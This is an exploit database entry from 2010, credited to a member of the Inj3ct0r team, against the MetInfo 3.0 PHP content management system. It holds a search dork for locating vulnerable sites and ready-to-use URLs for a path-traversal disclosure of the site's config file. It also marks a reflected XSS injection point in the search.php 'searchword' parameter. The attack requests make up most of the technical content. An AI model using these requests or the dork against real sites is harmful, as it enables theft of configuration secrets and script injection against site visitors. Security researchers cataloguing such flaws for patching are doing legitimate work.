Metinfo3.0 Multiple Vulnerability

2010-11-11T00:00:00
ID 1337DAY-ID-14792
Type zdt
Reporter anT!-Tr0J4n
Modified 2010-11-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =================================
Metinfo3.0 Multiple Vulnerability
=================================

                         ||          ||   | ||      
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               #########################################              1
0               I'm anT!-Tr0J4n member from Inj3ct0r Team              1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# Exploit Title: metinfo3.0 Mullti Vulnerability

# Date :       10-11-2010

# Author :    anT!-Tr0J4n

# Version :     3.0

#DorK     :    Powered by MetInfo 3.0
 
# Home    :    www.Dev-PoinT.com : http://milw0rm.ws

#Email     :    D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com

Vendorё   :   http://www.metinfo.cn/

#Greetz    :   Dev-PoinT.com   ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil ; Cyber-Err0r ; Mr.Mh$TEr ; M [Zero] ; R3d-D3v1l

#special thanks to milw0rm.ws team   :   r0073r,Sid3^effects,L0rd CruSad3r,SeeMe,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,indoushka, KnocKout,SONiC,ZoRLu


========================================================
metinfo3.0 source code disclosure Vulnerability
========================================================

[>] exploit ->

[+] http://localhost/metinfo/templates/met001/../../ [file disclosure]

EX :

[+] http://localhost/metinfo/templates/met001/../../config


======================================================
[>] metinfo3.0 XSS Vulnerability
======================================================

[>] exploit -> XSS Vulnerability


http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=[XSS]


http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=1



#  0day.today [2018-03-10]  #